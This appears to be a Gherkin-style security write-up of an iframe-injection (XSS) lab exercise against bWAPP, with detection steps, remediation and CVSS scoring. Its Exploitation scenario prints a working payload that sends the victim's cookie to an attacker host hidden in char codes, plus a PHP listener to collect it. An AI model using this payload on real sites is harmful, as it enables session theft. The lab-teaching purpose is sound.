## Version 1.4.1
## language: en

Feature: iframe-injection-medium
  TOE:
    bWAPP
  Category:
    Iframe injection
  Location:
    http://172.16.10.61/bWAPP/iframei.php - ParamHeight (field)
  CWE:
    CWE-79: Improper Neutralization of Input During
    Web Page Generation ('Cross-site Scripting')
  Rule:
    REQ.173: https://fluidattacks.com/web/rules/173/
  Goal:
    Steal the user's cookie
  Recommendation:
    Validate input and encode special characters

  Background:
  Hacker's software:
    | <Software name> | <Version>   |
    | Kali linux      | 4.19.0      |
    | Firefox         | 60.6.2      |
    | BurpSuite       | 1.7.36-56   |
    | PHP             | 5.2.4       |
  TOE information:
    Given The site
    When I enter into it
    Then It includes the "robots.txt" file

  Scenario: Normal use case
    Given The site
    When A user enters to it
    Then He can see the "robots.txt" file inside an Iframe

  Scenario: Static detection
    Given The source code
    When I see how the Iframe is created
    """
    <iframe frameborder="0"
    src="robots.txt"
    height="<?php echo xss($_GET["ParamHeight"])?>"
    width="<?php echo xss($_GET["ParamWidth"])?>"></iframe>
    """
    Then I see that the "robots.txt" is fixed
    But I can modify the other parameters
    When I see the validation in the "xss_check_4" function
    Then I understand that he calls another function
    """
    addslashes - returns a string with backslashes
    before characters that need to be quoted in database queries etc.
    These characters are single quote ('),
    double quote ("), backslash (\) and NUL (the NULL byte)
    """
    When I use a quote it will be replaced by "\""
    Then I can use it to close the other quotes
    And I can inject HTML code

  Scenario: Dynamic detection
    Given The site
    When I close the first quote
    Then I can close the Iframe tag
    When I create a "h1" tag
    """
    "</iframe><h1>Test</h1>
    """
    Then I can see that my code is rendered on the page
    And I can inject code

  Scenario: Exploitation
    Given The vulnerability
    When I start to create my payload
    Then I close the first quote and the Iframe tag
    """
    "</iframe>
    """
    When I know that I can use more quotes
    Then I have to create a payload to steal the user's cookie without them
    """
    "</iframe><script>
    new Image().src=String.concat(String.fromCharCode(104,116,116,112,58,47
    ,47,49,55,50,46,49,54,46,49,48,46,53,56,47),document.cookie);</script>
    """
    When I start a PHP server in my machine
    """
    $ php -S 0.0.0.0:80
    """
    Then I can listen for incoming requests
    When I send a request from my browser
    Then I can see an incoming request containing user's information
    And I steal the user's cookie [evidence](image1.png)

  Scenario: Remediation
    Given The source code
    When I use the function "xss_check3" instead of "xss_check4"
    Then I convert the special characters using the "htmlspecialchars" function
    """
    return htmlspecialchars($data, ENT_QUOTES, $encoding);
    """
    And The vulnerability is patched

  Scenario: Scoring
    Severity scoring according to CVSSv3 standard
    Base: Attributes that are constants over time and organizations
      7.5/10 (High) - AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    Temporal: Attributes that measure the exploit's popularity and fixability
      7.0/10 (High) - E:F/RL:O/RC:C/CR:H/IR:L/AR:X
    Environmental: Unique and relevant attributes to a specific user environment
      8.6/10 (High) - MAV:N/MAC:L/MPR:N/MUI:N/MS:U/MC:H/MI:N/MA:N

  Scenario: Correlations
    No correlations have been found to this date 2019-10-15
